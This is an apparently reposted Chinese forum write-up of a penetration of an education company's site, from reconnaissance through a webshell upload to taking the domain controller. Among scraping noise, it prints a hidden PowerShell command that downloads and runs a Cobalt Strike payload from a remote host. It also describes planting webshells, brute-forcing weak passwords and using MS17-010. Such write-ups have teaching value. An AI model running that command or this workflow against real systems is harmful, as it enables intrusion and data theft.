中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

: L2 X- ^" K: `2 \- o% i 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 $ N+ ]7 }8 }& {- e; [

$ p! G$ {' g5 U/ v0 R! X3 U

) A, e, n1 Q% S B c [# F   9 t/ Z, l. }9 f

& O( j x' g$ p

/ _# c" s" e, Y- ?/ P' \ 正文 ! e- X/ S6 p6 r. n: G' }7 o* d

! n+ e# I2 w6 }! Y! G

% F3 ~ s1 }4 I& q! \. i   2 C) f$ F4 M; ]8 s$ x8 i* b% x

) U% a6 x) q" K I+ d) m. @# K

9 r( q( d% q1 g* @ 目标:www.xxxx.com(一家教育机构)
, f0 X0 `' h) w( A8 E打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 p0 G6 p! ?$ W; U

# T; ~( n0 T; Q

8 G. U- t( s l7 t+ Y vshapes=- }# S; B9 K7 f8 Z s1 ^! ]

1 G" l/ z. P Q) ^

1 I4 E( T+ X1 Q! N9 `# m0 K0 K 进行了简单的信息搜集
! _) K& }, @% X: x& v
( {2 o0 ~/ y/ o 3 _4 t K8 ?9 Q

: t3 {: w2 w1 A+ I3 U

: ]! O" ` f8 }1 @! V 子域名搜集2 U) }5 g! n+ k( g

& q) C# y, R- t+ Q# Z; n$ k1 c8 \

8 F7 {( g& u0 r, h& c vshapes= , e' Y; D8 s) V) M' X: E7 w& X

' D7 C0 k! n; v( w J$ l/ [

7 e& D, j/ E' n9 k& E1 V* Z7 t. K fofa找资产
$ a: q! \0 N/ h" p1 o) t c
& n/ `1 X% J2 o% I1 c 1 u5 r8 |/ p6 h) |( N# P

7 |! |% {# A/ Y9 m9 D7 L" x

9 k/ J2 i8 |; ^$ b+ y vshapes= 4 v, C4 x( p5 F6 w) L7 F

5 ~ G( }2 b2 Y6 T" H

; E8 g% W5 y4 v 一共七个资产。去重之后只有两个。
6 z: c5 Q, {6 I4 W/ \
. d2 B6 h) d, P8 n5 b 9 m& ~' s0 a7 z

: w( B7 ~, o) ^ m$ _

. G1 x; a p3 g1 P% J+ e! y" q) m 目录探测% h+ N# G! y& @7 K3 {1 J2 K/ s! t# v/ ]

: Q) s1 L0 i4 ?: k1 e, F E; K R8 Q

% r" p/ p9 h- c5 Q6 K" ~* G vshapes= & t7 o0 h, c8 a0 ?8 M- W

2 @+ ]8 X% R% ~1 h

* m0 W( B k' o }+ m$ O 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ I" O( n" E. \9 M% m0 I. S
* Q5 w6 G2 ?& z+ `; s _1 ?0 N& ^

, J- ^3 T; A3 f, R

: ]: X: ~9 b5 `5 j9 k/ { 我又尝试了通过修改返回包来绕过登录界面 $ L& ^) O q) X) Q- w5 z( ]

& c# A8 Q, o" j2 P# P4 v% \, ^

" w$ _% A+ N! O vshapes=* _5 J' f X# w3 ^. `% Y* F& Z

" X5 P( [8 i5 R: E

* q% U- n# G6 I' y' B: J 还是不行,尝试注入无果, i* ]' |2 e1 c F7 t6 M4 S

5 A% ~- C/ ~! f

6 G' c i& k ? vshapes=& I' G- b2 U9 U$ y0 }3 k

2 x0 P4 i, Q' e, l

8 w5 Z; R* q2 b7 ]8 M% D# ? 不过我目录探测出了一处Spring信息泄露
( f I D3 m8 @2 D' D
4 P& g* o1 E$ K* W6 L& D. A/ v/ X+ g, B/ H# G( r1 i4 c( J. d V

) R5 E% H' [0 _6 J2 _

$ O z" z$ [; u( I7 w vshapes=$ p3 l& x* k- P- R; n4 z- l

5 [- z& {% Y9 t8 q- V \4 N) `) i

: A/ q$ S/ k: U' e$ K* {0 j6 b" Q 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 : q" X8 O" K3 b5 \/ W

* L8 b) I% D* `. @0 ]! ^9 N

& L1 u2 x* _* H* T2 V" }6 b. k vshapes=! L! Y" |% z" N1 i* h9 L0 D8 v

* o7 Q# \8 P( m9 r* k

& k7 ^. X ^' k 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。- y6 F; w2 M0 N( c

0 q+ z3 g1 c8 @; [: X& _$ U

2 b1 P$ n' p z vshapes=& q( W; w7 Z: G

2 h) l6 b. h1 y/ X$ J7 B

5 W7 J) v3 ]! h 获取有些师傅到这一步就手机抓包电脑测了。 6 r7 t" C) k0 z* N

( D+ e: T. p2 D# s T; H

; M7 u! B3 ^! ?$ H' x4 q4 a2 V Y Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 8 |( T4 p! R+ \( `: x8 E

' k- i* Q+ O% l7 j

/ [; X. a1 ]' Z- |& s' ? 其中在一个公众号发现了小程序,可以进行注册。) w5 c# o9 L; P8 ]) X4 k; q- V

" }6 [! t6 ^" q) L ~

* v: o: s8 S4 o, S8 C6 j 看到了头像上传,尝试上传获取WebShell+ O; R+ X3 x7 ]) B6 `/ T; m

6 {* l9 U( l' @

! p' u( L n, I# g vshapes= . Q+ {8 X5 B* K5 K

7 t9 X6 O$ N$ \9 F- [; i

, l, `, Q, V# L& Z 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问# j6 k3 r7 A$ H4 |7 R x0 O

% o6 X: n r" ~4 R" ^, s

t* s" J5 F+ z" {! ~ vshapes=9 T' l5 t* A+ x' G

. b- ]2 v1 Q* ?4 K- [

3 d" n$ l: [8 i# o& l: T4 K" | 然后上了大马. |* V' o6 m( t1 Y/ K$ m3 K

. N# e7 U' P5 w, O F. G

: [% j3 F+ Z1 O; T1 }* }$ O vshapes= 5 e" q" R! r1 {* ]

: Z z8 t+ S$ b

1 _; ], O7 L9 F( k3 c vshapes= 0 k; D1 _; v8 w) H

9 S% Y* o8 h- W r' m

. @' y! m* t9 h! j% a 通过翻找文件发现数据库账号密码 0 d/ k; C; m: t) @

3 U |' L; z4 q R }' H

* J. \; S/ f& A; x. u vshapes=& ^) x) c. b# v6 R* D: _# R

0 K" o8 N" x. m- ?9 p3 e

, L7 h+ W7 e, c --内网渗透9 |" T* P& ?! K! j* v

- _1 F) A# y. Z; Q3 ?8 w% I

6 ~& T' u+ P" e; q5 Q' T1 a+ H 直接通过powershell执行 cs上线8 s7 Z8 k# t; X$ c7 i( d

! `# X, J( X6 F6 o. q; q7 k: r/ e

1 b4 U( v7 u' H8 m @ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"6 I- ^. A+ B* T, z7 `& j; Z, t. i+ H

4 T; R Q/ ~0 T

! @; W! I' t4 J! u7 _ vshapes= 6 n T' b3 p. @" Q3 \7 y0 z# J

- @' l1 N- p5 k: Q6 Z" S

6 d4 x' V; d' K0 o1 {" [9 X 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 3 _. |, }2 h8 {) T8 ~& [. n

) `/ a& \5 V- X; J8 z: b2 Q

3 n6 K9 m& p K) Y& [+ R vshapes= * Y2 P1 u7 t" R c x! I

/ |; A; D, m2 v5 \' ]+ Q! A- P

' `+ r- P' o, e% p/ }, p 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
- Q. I4 h+ `$ X0 F
6 n2 f1 I: {1 T) [# L6 @$ m# K
- W7 L2 A5 M# A, y/ s, D. V/ j# ?5 t7 o- `

; O$ M, Z x- t5 }% F. x! j- J, }& u

, }! z; j! `6 {" `1 _( E& [ vshapes=; a( r* P3 `; [6 H1 [

' c; n# g6 ]) S+ X4 \

4 H% c0 m7 { c n. r 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
5 Q6 @1 }; X: P6 S* q0 n
0 | g3 V6 o# Z2 y' l+ h! | , K6 `# A2 b8 Y, Y% z2 d

# e# z3 Q5 R! J4 y( S

7 `, z- \# B( I6 j& j vshapes= # ^0 U( o- j) d

9 R: ~3 U* ?8 h

/ O) \6 }2 }# Z q9 L4 O
7 C) W$ a& T; |: w- G+ c
6 G0 o% |6 j5 S, `( k * U. N+ X# [; W# \; q S6 x

( u6 e0 I9 V1 V+ Z* Q9 o: |% @

% U8 P1 y- w0 X2 K0 S  # \# }" l, Q5 d

2 v L% _( m+ Y; \# E% m/ i

: H& ?8 {( G) x3 u: s& V 小结 % g( M4 T" N; t- N

' j* u: Z7 ?* a% t

9 L$ U3 ~9 w! L+ O1 v0 C   m8 e0 Y* _+ p( _

3 Y: d& A2 R+ o; q

1 t6 |2 u' x" w+ @! h/ U. F 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!% C$ A/ O/ c4 W, v1 G

/ p# f5 X: x% f4 t) e% y0 Q

, n, H$ u; v: g# N: U2 Y; U# ~   S% R% J: f& x, i8 `" s- F/ r+ w' I

/ Q6 \( T2 ?, _' ~5 G 7 B0 I! i w E- f, S* o# X

" u1 P/ h- x, z% M% X 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html; Q& }6 q6 A1 \) p% {& @0 z

% q! V N- h8 B/ o; G# ]6 E( S2 z' K

1 y8 C- V9 Q4 A  , O0 W! T- \9 L) ~: A





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2